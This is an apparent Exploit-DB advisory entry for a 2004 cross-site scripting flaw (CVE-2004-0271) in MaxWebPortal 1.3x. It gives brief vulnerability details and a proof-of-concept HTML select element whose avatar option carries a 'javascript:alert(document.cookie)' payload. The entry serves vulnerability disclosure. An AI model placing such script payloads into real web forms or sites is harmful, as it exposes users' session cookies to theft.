MaxWebPortal 1.3x Personal Message SendTo Parameter XSS

2004-02-10T00:00:00
ID EDB-ID:23677
Type exploitdb
Reporter Manuel Lopez
Modified 2004-02-10T00:00:00

Description

MaxWebPortal 1.3x Personal Message SendTo Parameter XSS. CVE-2004-0271. Webapps exploit for asp platform

                                        
                                            source: http://www.securityfocus.com/bid/9625/info
 
It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection.
 
MaxWebPortal versions prior to 1.32 have been reported to be prone to these issues.

<select name="Avatar_URL" size="4" onChange ="if (CheckNav(3.0,4.0)) URL.src=form.Avatar_URL.options[form.Avatar_URL.options.selectedIndex].value;">
<option value="javascript:alert(document.cookie)">POC-Avatar</option></select>